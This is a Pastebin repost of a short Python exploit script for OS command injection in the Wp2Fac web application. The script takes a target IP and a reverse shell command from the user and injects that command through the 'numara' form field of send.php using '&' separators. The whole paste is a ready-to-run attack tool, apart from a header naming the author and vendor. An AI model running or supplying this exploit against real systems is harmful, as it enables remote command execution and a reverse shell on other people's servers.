Advertisement
FlyFar

Wp2Fac - OS Command Injection

Jan 20th, 2024 (edited)
595
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.08 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wp2Fac v1.0 - OS Command Injection
  2. # Date: 2023-08-27
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor: https://github.com/metinyesil/wp2fac
  5. # Tested on: Kali Linux & Windows 11
  6. # CVE: N/A
  7.  
  8. import requests
  9.  
  10. def send_post_request(host, revshell):
  11.     url = f'http://{host}/send.php'
  12.     headers = {
  13.         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
  14. Gecko/20100101 Firefox/102.0',
  15.         'Accept': '*/*',
  16.         'Accept-Language': 'en-US,en;q=0.5',
  17.         'Accept-Encoding': 'gzip, deflate',
  18.         'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
  19.         'X-Requested-With': 'XMLHttpRequest',
  20.         'Origin': f'http://{host}',
  21.         'Connection': 'close',
  22.         'Referer': f'http://{host}/',
  23.     }
  24.  
  25.     data = {
  26.         'numara': f'1234567890 & {revshell} &;'
  27.     }
  28.  
  29.     response = requests.post(url, headers=headers, data=data)
  30.     return response.text
  31.  
  32. host = input("Target IP: ")
  33.  
  34. revshell = input("Reverse Shell Command: ")
  35.  
  36. print("Check your listener!")
  37.  
  38. send_post_request(host, revshell)
  39.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement